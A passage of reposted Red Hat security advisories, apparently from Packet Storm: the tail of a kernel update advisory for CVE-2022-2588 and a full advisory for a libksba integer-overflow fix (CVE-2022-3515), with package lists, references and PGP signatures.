kernel-debug-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-devel-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-headers-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-tools-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-693.106.1.el7.x86_64.rpm  
perf-3.10.0-693.106.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
python-perf-3.10.0-693.106.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.4):

x86_64:  
kernel-debug-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
kernel-tools-libs-devel-3.10.0-693.106.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-693.106.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2588  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fUONzjgjWX9erEAQiBeA/9G2mX5dCVG1Quj7x4Wr6GPzcL3Q+4Lwsd  
KncxgchmydcSih7lrZ7pIkSDqw6TQ/bRFTq+RLdQQNgWzc4FiqSddyZpGXsoRwsP  
KQKj+F6tbUlPWxugS4bq/XMVzibr5a6+DVXNKusLMVloGUM/xYqIZqjjjpr0iT0A  
MAgB5Fgu/jMh7V4l67RHzrj/jO9HUOWx9rUm3F2YBa26EmuSC7grpdR5uk/h0IW0  
ZLS5WEV0vzHsIYH31y1AFy1gobsFIivTQdMbL4S+ou8XVbPDofIw/jfrQWLYwjuL  
ra7fs2hZ9+hoSZijWB340FG7QHn5lc9DVQnJsUHMOKb+BXGSDiS83+mvkG9i5N/K  
fBih0xVPcP/WhPHZBKUwRd5/UxFg83pIAJfiKOon0JmkVFYMGgvVrOebrw6SBU1d  
Ah7eIBMvUMGcYD3rbLOKTGIGTF8ym99oUbOA5WJNjP9lUE9J5uaptLEKOc3GN3cL  
iJHgE6x9YTaJ+7GuYtkiCYLxs1rYRgfV6W+RBLkF/xGvU5sCnR4NxuUV4Ez44bLU  
2RudIZlrKSaFRRUpZfnN2kY0PljFGDmRgyzBCuA8+JLnxcCREL2qNJ3JJn0KOt3x  
fLZGpQu1M3ZoC6C1bkRpMqfi125HfAXh/1HMBtFvRhfBfS1JrcgfenXI1EbQzdf3  
RzxqIVdlto0=JZM5  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7146-01

Red Hat Security Advisory 2022-7089-01 - KSBA is a library to make X.509 certificates as well as the CMS easily accessible by other applications. Both specifications are building blocks of S/MIME and TLS. Issues addressed include code execution and integer overflow vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: libksba security update  
Advisory ID:       RHSA-2022:7089-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7089  
Issue date:        2022-10-24  
CVE Names:         CVE-2022-3515  
====================================================================  
1. Summary:

An update for libksba is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

KSBA (pronounced Kasbah) is a library to make X.509 certificates as well as  
the CMS easily accessible by other applications.  Both specifications are  
building blocks of S/MIME and TLS.

Security Fix(es):

* libksba: integer overflow may lead to remote code execution  
(CVE-2022-3515)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2135610 - CVE-2022-3515 libksba: integer overflow may lead to remote code execution

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
libksba-1.3.5-8.el8_6.src.rpm

aarch64:  
libksba-1.3.5-8.el8_6.aarch64.rpm  
libksba-debuginfo-1.3.5-8.el8_6.aarch64.rpm  
libksba-debugsource-1.3.5-8.el8_6.aarch64.rpm

ppc64le:  
libksba-1.3.5-8.el8_6.ppc64le.rpm  
libksba-debuginfo-1.3.5-8.el8_6.ppc64le.rpm  
libksba-debugsource-1.3.5-8.el8_6.ppc64le.rpm

s390x:  
libksba-1.3.5-8.el8_6.s390x.rpm  
libksba-debuginfo-1.3.5-8.el8_6.s390x.rpm  
libksba-debugsource-1.3.5-8.el8_6.s390x.rpm

x86_64:  
libksba-1.3.5-8.el8_6.i686.rpm  
libksba-1.3.5-8.el8_6.x86_64.rpm  
libksba-debuginfo-1.3.5-8.el8_6.i686.rpm  
libksba-debuginfo-1.3.5-8.el8_6.x86_64.rpm  
libksba-debugsource-1.3.5-8.el8_6.i686.rpm  
libksba-debugsource-1.3.5-8.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
libksba-debuginfo-1.3.5-8.el8_6.aarch64.rpm  
libksba-debugsource-1.3.5-8.el8_6.aarch64.rpm  
libksba-devel-1.3.5-8.el8_6.aarch64.rpm

ppc64le:  
libksba-debuginfo-1.3.5-8.el8_6.ppc64le.rpm  
libksba-debugsource-1.3.5-8.el8_6.ppc64le.rpm  
libksba-devel-1.3.5-8.el8_6.ppc64le.rpm

s390x:  
libksba-debuginfo-1.3.5-8.el8_6.s390x.rpm  
libksba-debugsource-1.3.5-8.el8_6.s390x.rpm  
libksba-devel-1.3.5-8.el8_6.s390x.rpm

x86_64:  
libksba-debuginfo-1.3.5-8.el8_6.i686.rpm  
libksba-debuginfo-1.3.5-8.el8_6.x86_64.rpm  
libksba-debugsource-1.3.5-8.el8_6.i686.rpm  
libksba-debugsource-1.3.5-8.el8_6.x86_64.rpm  
libksba-devel-1.3.5-8.el8_6.i686.rpm  
libksba-devel-1.3.5-8.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3515  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1crZtzjgjWX9erEAQhx7A//SUdnG+QOZ3xsfRI/q1Ste9doTLP2hJXh  
wn0kvLfUxwze03YUZu4Mfg63kAu55d4uq6cPdFYJ9/hL8KojUetxBW9x/zxysxj+  
ClLymTKn7FV+NzfQMt8GKuIRQrpxI7YGBgU+bEhyAkErXzyYmUsO0xd547a0Czbn  
j3lS49kDA1yelh1RgBfZ3MsXGhj6UJpqM9O6QGs4C5zsHTsM44cAUeb535QdjW4U  
2REAS4DSIaT7F7eFI5E4qT9S3saoFkKL7RjR1Chlq6G5o4Tcn9XSenycSaSeReKd  
pezHkOqte0bWz/uP69lSNCBUcGSJZNv/rvpLUNloUnBCxeBe2rMJ0SWSZxGrx0lZ  
7lWpaZjkOsGsy1rP652s3oIuNWbQNbgtcI+/kbncDap4C6OxJkOhOIuW0jOYmLoP  
IXcrkfLcqGdh5vT/DKw+b/CJJhW7exmazKIrpx4XwAIe/2aURQgl90DtXWQQUoV4  
ZKDbDy/bIonjgfHndUN4UPgz8zRdRJ+83xU/0efOexsLzKE4ttVNVp5mtRzp1K0e  
mhkN9qjpTxXvMOJbnewMEukXs5QFaL5Ijxfja2RfYVubQJNyUgpAdYpkiLZTNiVj  
wVtra0o4FCRaqUN7jg8mKKY4usZ8abqwbStYjBh2VSSYR2niKoQfkXAv/FEx6bC4  
sUEj8P9WCcU=Dx+Q  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm